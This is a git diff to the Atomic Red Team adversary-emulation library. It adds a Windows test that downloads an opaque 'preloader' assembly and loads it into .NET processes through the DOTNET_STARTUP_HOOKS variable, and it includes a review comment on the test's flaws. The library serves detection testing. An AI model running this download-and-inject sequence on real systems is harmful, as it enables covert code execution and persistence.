diff --git a/atomics/Indexes/Indexes-CSV/index.csv b/atomics/Indexes/Indexes-CSV/index.csv
index ec4d4ac4..15599860 100644
--- a/atomics/Indexes/Indexes-CSV/index.csv
+++ b/atomics/Indexes/Indexes-CSV/index.csv
@@ -398,6 +398,7 @@ defense-evasion,T1550.002,Pass the Hash,1,Mimikatz Pass the Hash,ec23cef9-27d9-4
defense-evasion,T1550.002,Pass the Hash,2,crackmapexec Pass the Hash,eb05b028-16c8-4ad8-adea-6f5b219da9a9,command_prompt
defense-evasion,T1550.002,Pass the Hash,3,Invoke-WMIExec Pass the Hash,f8757545-b00a-4e4e-8cfb-8cfb961ee713,powershell
defense-evasion,T1574.002,DLL Side-Loading,1,DLL Side-Loading using the Notepad++ GUP.exe binary,65526037-7079-44a9-bda1-2cb624838040,command_prompt
+defense-evasion,T1574.002,DLL Side-Loading,2,DLL Side-Loading using the dotnet startup hook environment variable,d322cdd7-7d60-46e3-9111-648848da7c02,command_prompt
defense-evasion,T1220,XSL Script Processing,1,MSXSL Bypass using local files,ca23bfb2-023f-49c5-8802-e66997de462d,command_prompt
defense-evasion,T1220,XSL Script Processing,2,MSXSL Bypass using remote files,a7c3ab07-52fb-49c8-ab6d-e9c6d4a0a985,command_prompt
defense-evasion,T1220,XSL Script Processing,3,WMIC bypass using local XSL file,1b237334-3e21-4a0c-8178-b8c996124988,command_prompt
@@ -564,6 +565,7 @@ privilege-escalation,T1543.002,Systemd Service,2,"Create Systemd Service file,
privilege-escalation,T1547.007,Re-opened Applications,1,Re-Opened Applications,5fefd767-ef54-4ac6-84d3-751ab85e8aba,manual
privilege-escalation,T1547.007,Re-opened Applications,2,Re-Opened Applications,5f5b71da-e03f-42e7-ac98-d63f9e0465cb,sh
privilege-escalation,T1574.002,DLL Side-Loading,1,DLL Side-Loading using the Notepad++ GUP.exe binary,65526037-7079-44a9-bda1-2cb624838040,command_prompt
+privilege-escalation,T1574.002,DLL Side-Loading,2,DLL Side-Loading using the dotnet startup hook environment variable,d322cdd7-7d60-46e3-9111-648848da7c02,command_prompt
privilege-escalation,T1037.001,Logon Script (Windows),1,Logon Scripts,d6042746-07d4-4c92-9ad8-e644c114a231,command_prompt
privilege-escalation,T1078.004,Cloud Accounts,1,Creating GCP Service Account and Service Account Key,9fdd83fd-bd53-46e5-a716-9dec89c8ae8e,gcloud
privilege-escalation,T1053.002,At,1,At.exe Scheduled task,4a6c0dc4-0f2a-4203-9298-a5a9bdc21ed8,command_prompt
@@ -795,6 +797,7 @@ persistence,T1543.002,Systemd Service,2,"Create Systemd Service file, Enable th
persistence,T1547.007,Re-opened Applications,1,Re-Opened Applications,5fefd767-ef54-4ac6-84d3-751ab85e8aba,manual
persistence,T1547.007,Re-opened Applications,2,Re-Opened Applications,5f5b71da-e03f-42e7-ac98-d63f9e0465cb,sh
persistence,T1574.002,DLL Side-Loading,1,DLL Side-Loading using the Notepad++ GUP.exe binary,65526037-7079-44a9-bda1-2cb624838040,command_prompt
+persistence,T1574.002,DLL Side-Loading,2,DLL Side-Loading using the dotnet startup hook environment variable,d322cdd7-7d60-46e3-9111-648848da7c02,command_prompt
persistence,T1037.001,Logon Script (Windows),1,Logon Scripts,d6042746-07d4-4c92-9ad8-e644c114a231,command_prompt
persistence,T1137.002,Office Test,1,Office Application Startup Test Persistence,c3e35b58-fe1c-480b-b540-7600fb612563,command_prompt
persistence,T1078.004,Cloud Accounts,1,Creating GCP Service Account and Service Account Key,9fdd83fd-bd53-46e5-a716-9dec89c8ae8e,gcloud
diff --git a/atomics/Indexes/Indexes-CSV/windows-index.csv b/atomics/Indexes/Indexes-CSV/windows-index.csv
index 36b761ae..5cae1b93 100644
--- a/atomics/Indexes/Indexes-CSV/windows-index.csv
+++ b/atomics/Indexes/Indexes-CSV/windows-index.csv
@@ -291,6 +291,7 @@ defense-evasion,T1550.002,Pass the Hash,1,Mimikatz Pass the Hash,ec23cef9-27d9-4
defense-evasion,T1550.002,Pass the Hash,2,crackmapexec Pass the Hash,eb05b028-16c8-4ad8-adea-6f5b219da9a9,command_prompt
defense-evasion,T1550.002,Pass the Hash,3,Invoke-WMIExec Pass the Hash,f8757545-b00a-4e4e-8cfb-8cfb961ee713,powershell
defense-evasion,T1574.002,DLL Side-Loading,1,DLL Side-Loading using the Notepad++ GUP.exe binary,65526037-7079-44a9-bda1-2cb624838040,command_prompt
+defense-evasion,T1574.002,DLL Side-Loading,2,DLL Side-Loading using the dotnet startup hook environment variable,d322cdd7-7d60-46e3-9111-648848da7c02,command_prompt
defense-evasion,T1220,XSL Script Processing,1,MSXSL Bypass using local files,ca23bfb2-023f-49c5-8802-e66997de462d,command_prompt
defense-evasion,T1220,XSL Script Processing,2,MSXSL Bypass using remote files,a7c3ab07-52fb-49c8-ab6d-e9c6d4a0a985,command_prompt
defense-evasion,T1220,XSL Script Processing,3,WMIC bypass using local XSL file,1b237334-3e21-4a0c-8178-b8c996124988,command_prompt
@@ -411,6 +412,7 @@ privilege-escalation,T1574.009,Path Interception by Unquoted Path,1,Execution of
privilege-escalation,T1546.010,AppInit DLLs,1,Install AppInit Shim,a58d9386-3080-4242-ab5f-454c16503d18,command_prompt
privilege-escalation,T1546.002,Screensaver,1,Set Arbitrary Binary as Screensaver,281201e7-de41-4dc9-b73d-f288938cbb64,command_prompt
privilege-escalation,T1574.002,DLL Side-Loading,1,DLL Side-Loading using the Notepad++ GUP.exe binary,65526037-7079-44a9-bda1-2cb624838040,command_prompt
+privilege-escalation,T1574.002,DLL Side-Loading,2,DLL Side-Loading using the dotnet startup hook environment variable,d322cdd7-7d60-46e3-9111-648848da7c02,command_prompt
privilege-escalation,T1037.001,Logon Script (Windows),1,Logon Scripts,d6042746-07d4-4c92-9ad8-e644c114a231,command_prompt
privilege-escalation,T1053.002,At,1,At.exe Scheduled task,4a6c0dc4-0f2a-4203-9298-a5a9bdc21ed8,command_prompt
privilege-escalation,T1055.001,Dynamic-link Library Injection,1,Process Injection via mavinject.exe,74496461-11a1-4982-b439-4d87a550d254,powershell
@@ -574,6 +576,7 @@ persistence,T1197,BITS Jobs,4,Bits download using desktopimgdownldr.exe (cmd),af
persistence,T1546.010,AppInit DLLs,1,Install AppInit Shim,a58d9386-3080-4242-ab5f-454c16503d18,command_prompt
persistence,T1546.002,Screensaver,1,Set Arbitrary Binary as Screensaver,281201e7-de41-4dc9-b73d-f288938cbb64,command_prompt
persistence,T1574.002,DLL Side-Loading,1,DLL Side-Loading using the Notepad++ GUP.exe binary,65526037-7079-44a9-bda1-2cb624838040,command_prompt
+persistence,T1574.002,DLL Side-Loading,2,DLL Side-Loading using the dotnet startup hook environment variable,d322cdd7-7d60-46e3-9111-648848da7c02,command_prompt
persistence,T1037.001,Logon Script (Windows),1,Logon Scripts,d6042746-07d4-4c92-9ad8-e644c114a231,command_prompt
persistence,T1137.002,Office Test,1,Office Application Startup Test Persistence,c3e35b58-fe1c-480b-b540-7600fb612563,command_prompt
persistence,T1053.002,At,1,At.exe Scheduled task,4a6c0dc4-0f2a-4203-9298-a5a9bdc21ed8,command_prompt
diff --git a/atomics/Indexes/Indexes-Markdown/index.md b/atomics/Indexes/Indexes-Markdown/index.md
index 1efcb309..bb5053db 100644
--- a/atomics/Indexes/Indexes-Markdown/index.md
+++ b/atomics/Indexes/Indexes-Markdown/index.md
@@ -590,6 +590,7 @@
- Atomic Test #3: Invoke-WMIExec Pass the Hash [windows]
- [T1574.002 DLL Side-Loading](../../T1574.002/T1574.002.md)
- Atomic Test #1: DLL Side-Loading using the Notepad++ GUP.exe binary [windows]
+ - Atomic Test #2: DLL Side-Loading using the dotnet startup hook environment variable [windows]
- T1126 Network Share Connection Removal [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1055.008 Ptrace System Calls [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1055.015 ListPlanting [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
@@ -895,6 +896,7 @@
- Atomic Test #2: Re-Opened Applications [macos]
- [T1574.002 DLL Side-Loading](../../T1574.002/T1574.002.md)
- Atomic Test #1: DLL Side-Loading using the Notepad++ GUP.exe binary [windows]
+ - Atomic Test #2: DLL Side-Loading using the dotnet startup hook environment variable [windows]
- T1160 Launch Daemon [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1055.008 Ptrace System Calls [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1037.001 Logon Script (Windows)](../../T1037.001/T1037.001.md)
@@ -1347,6 +1349,7 @@
- Atomic Test #2: Re-Opened Applications [macos]
- [T1574.002 DLL Side-Loading](../../T1574.002/T1574.002.md)
- Atomic Test #1: DLL Side-Loading using the Notepad++ GUP.exe binary [windows]
+ - Atomic Test #2: DLL Side-Loading using the dotnet startup hook environment variable [windows]
- T1098.002 Additional Email Delegate Permissions [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1084 Windows Management Instrumentation Event Subscription [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1160 Launch Daemon [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
diff --git a/atomics/Indexes/Indexes-Markdown/windows-index.md b/atomics/Indexes/Indexes-Markdown/windows-index.md
index b5d40221..9001b9d0 100644
--- a/atomics/Indexes/Indexes-Markdown/windows-index.md
+++ b/atomics/Indexes/Indexes-Markdown/windows-index.md
@@ -440,6 +440,7 @@
- Atomic Test #3: Invoke-WMIExec Pass the Hash [windows]
- [T1574.002 DLL Side-Loading](../../T1574.002/T1574.002.md)
- Atomic Test #1: DLL Side-Loading using the Notepad++ GUP.exe binary [windows]
+ - Atomic Test #2: DLL Side-Loading using the dotnet startup hook environment variable [windows]
- T1126 Network Share Connection Removal [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1055.015 ListPlanting [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1484 Domain Policy Modification [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
@@ -658,6 +659,7 @@
- T1055.005 Thread Local Storage [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1574.002 DLL Side-Loading](../../T1574.002/T1574.002.md)
- Atomic Test #1: DLL Side-Loading using the Notepad++ GUP.exe binary [windows]
+ - Atomic Test #2: DLL Side-Loading using the dotnet startup hook environment variable [windows]
- [T1037.001 Logon Script (Windows)](../../T1037.001/T1037.001.md)
- Atomic Test #1: Logon Scripts [windows]
- T1055.015 ListPlanting [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
@@ -974,6 +976,7 @@
- T1136 Create Account [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1574.002 DLL Side-Loading](../../T1574.002/T1574.002.md)
- Atomic Test #1: DLL Side-Loading using the Notepad++ GUP.exe binary [windows]
+ - Atomic Test #2: DLL Side-Loading using the dotnet startup hook environment variable [windows]
- T1098.002 Additional Email Delegate Permissions [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1084 Windows Management Instrumentation Event Subscription [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1037.001 Logon Script (Windows)](../../T1037.001/T1037.001.md)
diff --git a/atomics/Indexes/index.yaml b/atomics/Indexes/index.yaml
index 9a10c7a5..58f04b77 100644
--- a/atomics/Indexes/index.yaml
+++ b/atomics/Indexes/index.yaml
@@ -24249,6 +24249,55 @@ defense-evasion:
command: "#{gup_executable}\n"
cleanup_command: 'taskkill /F /IM #{process_name} >nul 2>&1
+ '
+ name: command_prompt
+ - name: DLL Side-Loading using the dotnet startup hook environment variable
+ auto_generated_guid: d322cdd7-7d60-46e3-9111-648848da7c02
+ description: 'Utilizing the dotnet_startup_hooks environment variable, this
+ method allows for registering a global method in an assembly that will be
+ executed whenever a .net core application is started. This unlocks a whole
+ range of scenarios, from injecting a profiler to tweaking a static context
+ in a given environment. [blog post](https://medium.com/criteo-engineering/c-have-some-fun-with-net-core-startup-hooks-498b9ad001e1)
+
+ '
+ supported_platforms:
+ - windows
+ input_arguments:
+ process_name:
+ description: Name of the created process
+ type: String
+ default: calculator.exe
+ preloader_dll:
+ description: library for interfacing with the dotnet framework
+ type: Path
+ default: PathToAtomicsFolder\T1574.002\bin\preloader
+ dependency_executor_name: powershell
+ dependencies:
+ - description: ".Net SDK must be installed\n"
+ prereq_command: 'if (Test-Path "C:\Program Files\dotnet\dotnet.exe") {exit
+ 0} else {exit 1}
+
+ '
+ get_prereq_command: |
+ winget install Microsoft.DotNet.SDK.6 --accept-source-agreements --accept-package-agreements -h > $null
+ echo.
+ - description: 'preloader must exist
+
+ '
+ prereq_command: 'if (Test-Path "#{preloader_dll}") {exit 0} else {exit 1}
+
+ '
+ get_prereq_command: 'Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.002/bin/preloader?raw=true"
+ -OutFile "#{preloader_dll}"
+
+ '
+ executor:
+ command: |
+ set DOTNET_STARTUP_HOOKS=#{preloader_dll}
+ dotnet -h > nul
+ echo.
+ cleanup_command: 'taskkill /F /IM #{process_name} >nul 2>&1
+
'
name: command_prompt
T1126:
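Review bot: `#{process_name}` is referenced only in `cleanup_command` (`taskkill /F /IM #{process_name} >nul 2>&1`) and never in the attack command, so changing the input cannot change what the bundled preloader assembly launches; the `process_name` description should say it must match the image name the preloader is built to start, or the argument should be dropped in favour of a fixed cleanup. The first prereq check tests the fixed path `C:\Program Files\dotnet\dotnet.exe` while the attack command relies on `dotnet` being resolvable on PATH; `if (Get-Command dotnet -ErrorAction SilentlyContinue) {exit 0} else {exit 1}` would keep the check and the executor consistent. The preloader is fetched as an opaque binary via `Invoke-WebRequest` with no pointer to its source, so a sentence in `description` naming where the assembly's source lives (`<path to preloader source>`) would let reviewers and defenders confirm what the startup hook actually does when it fires. The same block is repeated verbatim in the privilege-escalation and persistence hunks below and rendered into T1574.002.md; these index files appear to be generated, so the fix belongs in the underlying atomic YAML, which is not part of this diff.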
@@ -39454,6 +39503,55 @@ privilege-escalation:
command: "#{gup_executable}\n"
cleanup_command: 'taskkill /F /IM #{process_name} >nul 2>&1
+ '
+ name: command_prompt
+ - name: DLL Side-Loading using the dotnet startup hook environment variable
+ auto_generated_guid: d322cdd7-7d60-46e3-9111-648848da7c02
+ description: 'Utilizing the dotnet_startup_hooks environment variable, this
+ method allows for registering a global method in an assembly that will be
+ executed whenever a .net core application is started. This unlocks a whole
+ range of scenarios, from injecting a profiler to tweaking a static context
+ in a given environment. [blog post](https://medium.com/criteo-engineering/c-have-some-fun-with-net-core-startup-hooks-498b9ad001e1)
+
+ '
+ supported_platforms:
+ - windows
+ input_arguments:
+ process_name:
+ description: Name of the created process
+ type: String
+ default: calculator.exe
+ preloader_dll:
+ description: library for interfacing with the dotnet framework
+ type: Path
+ default: PathToAtomicsFolder\T1574.002\bin\preloader
+ dependency_executor_name: powershell
+ dependencies:
+ - description: ".Net SDK must be installed\n"
+ prereq_command: 'if (Test-Path "C:\Program Files\dotnet\dotnet.exe") {exit
+ 0} else {exit 1}
+
+ '
+ get_prereq_command: |
+ winget install Microsoft.DotNet.SDK.6 --accept-source-agreements --accept-package-agreements -h > $null
+ echo.
+ - description: 'preloader must exist
+
+ '
+ prereq_command: 'if (Test-Path "#{preloader_dll}") {exit 0} else {exit 1}
+
+ '
+ get_prereq_command: 'Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.002/bin/preloader?raw=true"
+ -OutFile "#{preloader_dll}"
+
+ '
+ executor:
+ command: |
+ set DOTNET_STARTUP_HOOKS=#{preloader_dll}
+ dotnet -h > nul
+ echo.
+ cleanup_command: 'taskkill /F /IM #{process_name} >nul 2>&1
+
'
name: command_prompt
T1160:
@@ -61959,6 +62057,55 @@ persistence:
command: "#{gup_executable}\n"
cleanup_command: 'taskkill /F /IM #{process_name} >nul 2>&1
+ '
+ name: command_prompt
+ - name: DLL Side-Loading using the dotnet startup hook environment variable
+ auto_generated_guid: d322cdd7-7d60-46e3-9111-648848da7c02
+ description: 'Utilizing the dotnet_startup_hooks environment variable, this
+ method allows for registering a global method in an assembly that will be
+ executed whenever a .net core application is started. This unlocks a whole
+ range of scenarios, from injecting a profiler to tweaking a static context
+ in a given environment. [blog post](https://medium.com/criteo-engineering/c-have-some-fun-with-net-core-startup-hooks-498b9ad001e1)
+
+ '
+ supported_platforms:
+ - windows
+ input_arguments:
+ process_name:
+ description: Name of the created process
+ type: String
+ default: calculator.exe
+ preloader_dll:
+ description: library for interfacing with the dotnet framework
+ type: Path
+ default: PathToAtomicsFolder\T1574.002\bin\preloader
+ dependency_executor_name: powershell
+ dependencies:
+ - description: ".Net SDK must be installed\n"
+ prereq_command: 'if (Test-Path "C:\Program Files\dotnet\dotnet.exe") {exit
+ 0} else {exit 1}
+
+ '
+ get_prereq_command: |
+ winget install Microsoft.DotNet.SDK.6 --accept-source-agreements --accept-package-agreements -h > $null
+ echo.
+ - description: 'preloader must exist
+
+ '
+ prereq_command: 'if (Test-Path "#{preloader_dll}") {exit 0} else {exit 1}
+
+ '
+ get_prereq_command: 'Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.002/bin/preloader?raw=true"
+ -OutFile "#{preloader_dll}"
+
+ '
+ executor:
+ command: |
+ set DOTNET_STARTUP_HOOKS=#{preloader_dll}
+ dotnet -h > nul
+ echo.
+ cleanup_command: 'taskkill /F /IM #{process_name} >nul 2>&1
+
'
name: command_prompt
T1098.002:
diff --git a/atomics/T1574.002/T1574.002.md b/atomics/T1574.002/T1574.002.md
index 62ab18dc..54fbbd32 100644
--- a/atomics/T1574.002/T1574.002.md
+++ b/atomics/T1574.002/T1574.002.md
@@ -8,6 +8,8 @@ Side-loading takes advantage of the DLL search order used by the loader by posit
- [Atomic Test #1 - DLL Side-Loading using the Notepad++ GUP.exe binary](#atomic-test-1---dll-side-loading-using-the-notepad-gupexe-binary)
+- [Atomic Test #2 - DLL Side-Loading using the dotnet startup hook environment variable](#atomic-test-2---dll-side-loading-using-the-dotnet-startup-hook-environment-variable)
+
@@ -60,4 +62,66 @@ Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/blob/master/at
+
+
+
+## Atomic Test #2 - DLL Side-Loading using the dotnet startup hook environment variable
+Utilizing the dotnet_startup_hooks environment variable, this method allows for registering a global method in an assembly that will be executed whenever a .net core application is started. This unlocks a whole range of scenarios, from injecting a profiler to tweaking a static context in a given environment. [blog post](https://medium.com/criteo-engineering/c-have-some-fun-with-net-core-startup-hooks-498b9ad001e1)
+
+**Supported Platforms:** Windows
+
+
+**auto_generated_guid:** d322cdd7-7d60-46e3-9111-648848da7c02
+
+
+
+
+
+#### Inputs:
+| Name | Description | Type | Default Value |
+|------|-------------|------|---------------|
+| process_name | Name of the created process | String | calculator.exe|
+| preloader_dll | library for interfacing with the dotnet framework | Path | PathToAtomicsFolder\T1574.002\bin\preloader|
+
+
+#### Attack Commands: Run with `command_prompt`!
+
+
+```cmd
+set DOTNET_STARTUP_HOOKS=#{preloader_dll}
+dotnet -h > nul
+echo.
+```
+
+#### Cleanup Commands:
+```cmd
+taskkill /F /IM #{process_name} >nul 2>&1
+```
+
+
+
+#### Dependencies: Run with `powershell`!
+##### Description: .Net SDK must be installed
+##### Check Prereq Commands:
+```powershell
+if (Test-Path "C:\Program Files\dotnet\dotnet.exe") {exit 0} else {exit 1}
+```
+##### Get Prereq Commands:
+```powershell
+winget install Microsoft.DotNet.SDK.6 --accept-source-agreements --accept-package-agreements -h > $null
+echo.
+```
+##### Description: preloader must exist
+##### Check Prereq Commands:
+```powershell
+if (Test-Path "#{preloader_dll}") {exit 0} else {exit 1}
+```
+##### Get Prereq Commands:
+```powershell
+Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.002/bin/preloader?raw=true" -OutFile "#{preloader_dll}"
+```
+
+
+
+